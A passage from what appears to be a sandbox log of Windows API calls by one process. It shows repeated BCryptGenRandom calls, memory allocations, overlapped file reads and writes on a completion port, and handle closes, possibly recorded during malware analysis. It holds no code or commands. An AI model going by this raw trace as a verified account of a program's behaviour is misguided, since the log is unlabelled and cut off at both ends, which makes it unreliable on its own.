lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0093.148] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0093.150] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0093.150] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0093.150] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0093.153] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0093.153] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0093.153] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0093.153] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0093.153] free (_Block=0x77d800) [0093.153] calloc (_Count=0x41, _Size=0x4) returned 0x2071008 [0093.153] calloc (_Count=0x82, _Size=0x4) returned 0x2071118 [0093.178] free (_Block=0x2071008) [0093.178] free (_Block=0x2071118) [0093.178] free (_Block=0x77d908) [0093.178] WriteFile (in: hFile=0x13dc, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0093.180] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0093.214] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0093.217] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0093.217] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0093.217] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0093.220] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0093.220] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0093.220] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0093.220] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0093.220] free (_Block=0x77d800) [0093.220] calloc (_Count=0x41, _Size=0x4) returned 0x2071008 [0093.220] calloc (_Count=0x82, _Size=0x4) returned 0x2071118 [0093.221] free (_Block=0x2071008) [0093.221] free (_Block=0x2071118) [0093.221] free (_Block=0x77d908) [0093.221] WriteFile (in: hFile=0x11a0, lpBuffer=0x3d7007c*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048) returned 1 [0093.221] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0093.231] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0093.235] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0093.235] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0093.235] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0093.238] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0093.238] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0093.238] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0093.238] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0093.238] free (_Block=0x77d800) [0093.238] calloc (_Count=0x41, _Size=0x4) returned 0x2071008 [0093.238] calloc (_Count=0x82, _Size=0x4) returned 0x2071118 [0093.239] free (_Block=0x2071008) [0093.239] free (_Block=0x2071118) [0093.239] free (_Block=0x77d908) [0093.239] WriteFile (in: hFile=0x13dc, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x617, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0093.239] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0093.279] WriteFile (in: hFile=0x11a0, lpBuffer=0x3d7007c*, nNumberOfBytesToWrite=0x7260, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048) returned 1 [0093.279] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0093.311] WriteFile (in: hFile=0x13dc, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x12c0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0093.311] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0093.324] ReadFile (in: hFile=0x1194, lpBuffer=0x3e300ac, nNumberOfBytesToRead=0x1aaec, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e30078 | out: lpBuffer=0x3e300ac*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e30078) returned 1 [0093.326] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0093.327] CloseHandle (hObject=0x1194) returned 1 [0093.327] free (_Block=0x3e30078) [0093.332] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0093.362] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0093.365] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0093.365] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0093.365] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0093.368] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0093.368] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0093.371] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0093.371] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0093.371] free (_Block=0x77d800) [0093.371] calloc (_Count=0x41, _Size=0x4) returned 0x2071008 [0093.372] calloc (_Count=0x82, _Size=0x4) returned 0x2071118 [0093.372] free (_Block=0x2071008) [0093.372] free (_Block=0x2071118) [0093.372] free (_Block=0x77d908) [0093.372] WriteFile (in: hFile=0x13e0, lpBuffer=0x3e7011c*, nNumberOfBytesToWrite=0x619, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e700e8 | out: lpBuffer=0x3e7011c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e700e8) returned 1 [0093.373] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0093.380] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0093.383] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0093.383] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0093.383] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0093.385] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0093.385] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0093.386] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0093.386] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0093.386] free (_Block=0x77d800) [0093.386] calloc (_Count=0x41, _Size=0x4) returned 0x2071008 [0093.386] calloc (_Count=0x82, _Size=0x4) returned 0x2071118 [0093.386] free (_Block=0x2071008) [0093.386] free (_Block=0x2071118) [0093.386] free (_Block=0x77d908) [0093.386] WriteFile (in: hFile=0x1194, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x61f, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0093.387] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0093.426] WriteFile (in: hFile=0x13e0, lpBuffer=0x3e7011c*, nNumberOfBytesToWrite=0x18340, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e700e8 | out: lpBuffer=0x3e7011c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e700e8) returned 1 [0093.427] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0093.456] CloseHandle (hObject=0x1194) returned 1 [0093.456] free (_Block=0x1ff1e60) [0093.456] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0093.498] ReadFile (in: hFile=0x13dc, lpBuffer=0x3eb018c, nNumberOfBytesToRead=0x321a4, lpNumberOfBytesRead=0x0, lpOverlapped=0x3eb0158 | out: lpBuffer=0x3eb018c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3eb0158) returned 1 [0093.510] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0095.339] WriteFile (in: hFile=0x1e8, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0xef30, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0095.339] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0095.352] ReadFile (in: hFile=0x334, lpBuffer=0x3db00ec, nNumberOfBytesToRead=0xb04, lpNumberOfBytesRead=0x0, lpOverlapped=0x3db00b8 | out: lpBuffer=0x3db00ec*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3db00b8) returned 1 [0095.352] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0095.352] CloseHandle (hObject=0x334) returned 1 [0095.353] free (_Block=0x3db00b8) [0095.358] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0095.638] WriteFile (in: hFile=0x330, lpBuffer=0x3d7007c*, nNumberOfBytesToWrite=0x37f70, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048) returned 1 [0095.638] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0095.889] CloseHandle (hObject=0x334) returned 1 [0095.890] free (_Block=0x3ef0008) [0095.890] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0095.918] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0095.921] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0095.921] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0095.921] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0095.924] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0095.924] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0095.928] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0095.928] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0095.928] free (_Block=0x77d800) [0095.928] calloc (_Count=0x41, _Size=0x4) returned 0x2071818 [0095.928] calloc (_Count=0x82, _Size=0x4) returned 0x2071928 [0095.929] free (_Block=0x2071818) [0095.929] free (_Block=0x2071928) [0095.929] free (_Block=0x77d908) [0095.929] WriteFile (in: hFile=0x13e0, lpBuffer=0x3db00ec*, nNumberOfBytesToWrite=0x61b, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3db00b8 | out: lpBuffer=0x3db00ec*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3db00b8) returned 1 [0095.929] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0096.269] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0096.272] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0096.272] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0096.272] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0096.275] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0096.275] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0096.278] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0096.278] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0096.278] free (_Block=0x77d800) [0096.278] calloc (_Count=0x41, _Size=0x4) returned 0x2071818 [0096.279] calloc (_Count=0x82, _Size=0x4) returned 0x2071928 [0096.279] free (_Block=0x2071818) [0096.279] free (_Block=0x2071928) [0096.279] free (_Block=0x77d908) [0096.279] WriteFile (in: hFile=0x330, lpBuffer=0x3db00ec*, nNumberOfBytesToWrite=0x615, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3db00b8 | out: lpBuffer=0x3db00ec*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3db00b8) returned 1 [0096.280] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0097.363] CloseHandle (hObject=0x13e4) returned 1 [0097.364] free (_Block=0x1ff1e60) [0097.364] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0097.365] CloseHandle (hObject=0x330) returned 1 [0097.365] free (_Block=0x3df0008) [0097.366] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0097.367] CloseHandle (hObject=0x1194) returned 1 [0097.367] free (_Block=0x3ef0008) [0097.367] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0097.367] CloseHandle (hObject=0x3b4) returned 1 [0097.367] free (_Block=0x3d70048) [0097.368] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0097.439] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0097.442] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0097.442] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0097.442] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0097.445] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0097.445] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0097.449] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0097.449] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0097.449] free (_Block=0x77d800) [0097.449] calloc (_Count=0x41, _Size=0x4) returned 0x2071818 [0097.449] calloc (_Count=0x82, _Size=0x4) returned 0x2071928 [0097.449] free (_Block=0x2071818) [0097.449] free (_Block=0x2071928) [0097.450] free (_Block=0x77d908) [0097.450] WriteFile (in: hFile=0x3a8, lpBuffer=0x3e300ac*, nNumberOfBytesToWrite=0x611, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e30078 | out: lpBuffer=0x3e300ac*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e30078) returned 1 [0097.450] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0097.490] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0097.493] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0097.493] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0097.493] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0097.495] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0097.495] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0097.496] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0097.496] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0097.496] free (_Block=0x77d800) [0097.496] calloc (_Count=0x41, _Size=0x4) returned 0x2071818 [0097.496] calloc (_Count=0x82, _Size=0x4) returned 0x2071928 [0097.496] free (_Block=0x2071818) [0097.496] free (_Block=0x2071928) [0097.496] free (_Block=0x77d908) [0097.496] WriteFile (in: hFile=0x3b4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x611, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0097.497] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0097.575] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0097.579] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0097.579] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0097.579] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0097.582] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0097.582] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0097.582] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0097.582] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0097.582] free (_Block=0x77d800) [0097.582] calloc (_Count=0x41, _Size=0x4) returned 0x2071818 [0097.582] calloc (_Count=0x82, _Size=0x4) returned 0x2071928 [0097.582] free (_Block=0x2071818) [0097.582] free (_Block=0x2071928) [0097.582] free (_Block=0x77d908) [0097.583] WriteFile (in: hFile=0x3b0, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0097.583] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0097.593] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0097.596] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0097.596] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0097.596] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0097.599] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0097.599] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0097.599] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0097.600] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0097.600] free (_Block=0x77d800) [0097.600] calloc (_Count=0x41, _Size=0x4) returned 0x2071818 [0097.600] calloc (_Count=0x82, _Size=0x4) returned 0x2071928 [0097.600] free (_Block=0x2071818) [0097.600] free (_Block=0x2071928) [0097.600] free (_Block=0x77d908) [0097.600] WriteFile (in: hFile=0x3b4, lpBuffer=0x3ef003c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 1 [0097.601] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0100.480] CloseHandle (hObject=0x3b0) returned 1 [0100.480] free (_Block=0x1ff1e60) [0100.480] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0100.482] WriteFile (in: hFile=0x3b4, lpBuffer=0x3d7007c*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048) returned 1 [0100.484] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0100.576] ReadFile (in: hFile=0x334, lpBuffer=0x3db00ec, nNumberOfBytesToRead=0x3a18, lpNumberOfBytesRead=0x0, lpOverlapped=0x3db00b8 | out: lpBuffer=0x3db00ec*, 